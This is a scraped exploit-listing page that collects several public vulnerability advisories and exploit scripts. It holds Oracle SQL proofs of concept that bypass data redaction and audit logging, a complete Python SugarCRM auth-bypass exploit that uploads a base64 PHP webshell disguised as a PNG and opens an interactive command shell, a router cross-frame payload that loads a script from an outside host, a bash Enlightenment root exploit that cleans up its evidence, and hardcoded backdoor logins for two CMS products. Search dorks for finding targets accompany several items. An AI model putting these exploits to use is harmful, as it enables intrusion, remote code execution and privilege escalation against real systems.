Latest exploits :: CodePwn

<pre><code>Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database system Product: Database Manufacturer: Oracle Affected Version(s): 19c,21c Tested Version(s): 19c,21c CVE Reference: N/A Author of Advisory: Emad Al-Mousa Overview: DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package. This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed. ************************************************** Proof of Concept (PoC): In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables. SQL> CREATE TABLE HR.TABLE2( COMPANY_NAME VARCHAR2(10 BYTE), REGION VARCHAR2(10 BYTE), SALES NUMBER(12), DIVISION_NAME VARCHAR2(12)); SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES); SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL'); SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL'); SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT'); SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING'); SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT'); SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL'); SQL> commit; I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2: sqlplus / as sysdba SQL> begin dbms_redact.add_policy( object_schema => 'HR', object_name => 'TABLE2', column_name => 'SALES', policy_name => 'REDACT_HR_SALES', function_type => DBMS_REDACT.FULL, expression => '1=1'); end;/ I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table: sqlplus / as sysdba SQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro; connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command: info+ HR.TABLE2; The histogram data for SALES column will show the actual vaules stored in the redacted column. Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only. ************************************************** References: https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852 https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/ Thanks,Emad </code></pre>

<pre><code>Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass Product: Database Manufacturer: Oracle Affected Version(s): 12.1.0.2, 12.2.0.1, 19c Tested Version(s): 19c Risk Level: low Solution Status: Fixed Manufacturer Notification: 2021-03-17 Solution Date: 2021-10-17 Public Disclosure: 2022-06-11 CVE Reference: CVE-2021-35576 Author of Advisory: Emad Al-Mousa Overview: Oracle Database is a general purpose relational database management system (RDMBS). Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role. ***************************************** Vulnerability Details: The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection. ***************************************** Proof of Concept (PoC): I will create a table in pluggable database PDB1 under HR schema and insert few records: SQL> CREATE TABLE HR.EMPLOYEE ( FIRST_NAME VARCHAR2(50), LAST_NAME VARCHAR2(50) ); SQL> INSERT INTO HR.EMPLOYEE ( FIRST_NAME, LAST_NAME) VALUES ( 'EMAD','MOUSA' ); SQL> commit; SQL> INSERT INTO HR.EMPLOYEE ( FIRST_NAME, LAST_NAME) VALUES ( 'SAMI','MOUSA' ); SQL> commit; I will now create audit policy: SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE; SQL> audit policy SELECT_P1; To check audit policies configured in PDB1 database: SQL> SELECT * FROM audit_unified_enabled_policies; Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode: sqlplus / as sysdba SQL> alter session set container=PDB1; SQL> shutdown immediate; SQL> startup upgrade; SQL> select * from HR.EMPLOYEE; SQL> startup force; SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL; Checking the audit logs using the query, NO entry is found recorded in the unified audit trail: SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc; So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view ! ***************************************** References: https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/ https://nvd.nist.gov/vuln/detail/CVE-2021-35576 Credit: Emad Al-Mousa: CVE-2021-35576 </code></pre>

<pre><code>#!/usr/bin/env python # # SugarCRM 0-day Auth Bypass + RCE Exploit # # Dorks: # https://www.google.com/search?q=site:sugarondemand.com&filter=0 # https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php # https://www.shodan.io/search?query=http.title:"SugarCRM" # https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM" # https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com" import base64, re, requests, sys, uuid requests.packages.urllib3.disable_warnings() if len(sys.argv) != 2: sys.exit("Usage: %s [URL]" % sys.argv[0]) print "[+] Sending authentication request" url = sys.argv[1] + "/index.php" session = {"PHPSESSID": str(uuid.uuid4())} params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1} requests.post(url, cookies=session, data=params, verify=False) print "[+] Uploading PHP shell\n" png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC" upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml params = {"module": "EmailTemplates", "action": "AttachFiles"} requests.post(url, cookies=session, data=params, files=upload, verify=False) url = sys.argv[1] + "/cache/images/sweet.phar" while True: cmd = raw_input("# ") res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False) res = re.search("#####(.*)#####", res.text, re.DOTALL) if res: print res.group(1) else: sys.exit("\n[+] Failure!\n") </code></pre>

<pre><code>==================================================================================================================================== | # Title : BDWeb-Link Lms v1.11.5 SQL Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://bdweblink.com | | # Dork : Developed by Developed by BD Web Link | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] http://127.0.0.1/single-page.php?id=71 <====| inject here [+] https://127.0.0.1/Dashboard <====| Login Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code> Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting Vendor: Hughes Network Systems, LLC Product web page: https://www.hughes.com Affected version: HX200 v8.3.1.14 HX90 v6.11.0.5 HX50L v6.10.0.18 HN9460 v8.2.0.48 HN7000S v6.9.0.37 Summary: The HX200 is a high-performance satellite router designed to provide carrier-grade IP services using dynamically assigned high-bandwidth satellite IP connectivity. The HX200 satellite router provides flexible Quality of Service (QoS) features that can be tailored to the network applications at each individual remote router, such as Adaptive Constant Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing. With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT, and DNS Server/Relay functionality, together with a high-performance satellite modem, the HX200 is a full-featured IP Router with an integrated high-performance satellite router. The HX200 enables high- performance IP connectivity for a variety of applications including cellular backhaul, MPLS extension services, virtual leased line, mobile services and other high-bandwidth solutions. Desc: The router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application. Tested on: WindWeb/1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5743 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php 23.12.2022 -- snippet:///XFSRFI // // Hughes Satellite Router RFI/XFS PoC Exploit // by lqwrm 2022 // //URL http://TARGET/fs/dynaform/speedtest.html //Reload target //window.location.reload() console.log("Loading Broadband Satellite Browsing Test"); //Add cross-frame file include (http only) AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg"); console.log("Calling StartTest()"); StartTest() //console.log("Calling DoTest()"); //DoTest() //Unload weapon //document.getElementById("URLList").remove(); </code></pre>

<pre><code>## Title: Enlightenment Version: 0.25.3 LPE ## Author: nu11secur1ty ## Date: 12.26.2022 ## Vendor: https://www.enlightenment.org/ ## Software: https://www.enlightenment.org/download ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706 ## Description: The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation. Enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring If the attacker has access locally to some machine on which the machine is installed Enlightenment he can use this vulnerability to do very dangerous stuff. ## STATUS: CRITICAL Vulnerability ## Tested on: ```bash DISTRIB_ID=Ubuntu DISTRIB_RELEASE=22.10 DISTRIB_CODENAME=kinetic DISTRIB_DESCRIPTION="Ubuntu 22.10" PRETTY_NAME="Ubuntu 22.10" NAME="Ubuntu" VERSION_ID="22.10" VERSION="22.10 (Kinetic Kudu)" VERSION_CODENAME=kinetic ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=kinetic LOGO=ubuntu-logo ``` [+] Exploit: ```bash #!/usr/bin/bash # Idea by MaherAzzouz # Development by nu11secur1ty echo "CVE-2022-37706" echo "[*] Trying to find the vulnerable SUID file..." echo "[*] This may take few seconds..." # The actual problem file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Welcome to the rabbit hole :)" ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net read -p "Press any key to clean the evedence..." echo -e "Please wait... " sleep 5 rm -rf /tmp/exploit rm -rf /tmp/net echo -e "Done; Everything is clear ;)" ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706) ## Proof and Exploit: [href](https://streamable.com/zflbgg) ## Time spent `01:00:00` </code></pre>

<pre><code>==================================================================================================================================== | # Title : COURIER DEPRIXA V2.5 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=admin & pass=09731 [+] https://deprixalogistics.online/dashboard/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>======================================================================================================================================================================================= | # Title : consultine consulting business and finance website cms v1.8 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://codecanyon.net/item/consultine-consulting-business-and-finance-website-cms/22236735 | | # Dork : About Us Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex enim concludaturque. Senserit salutandi euripidis no per, modus maiestatis scribentur est an.| ======================================================================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=admin@gmail.com & pass=1234 [+] https://www.seusite.top/jornal/admin/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>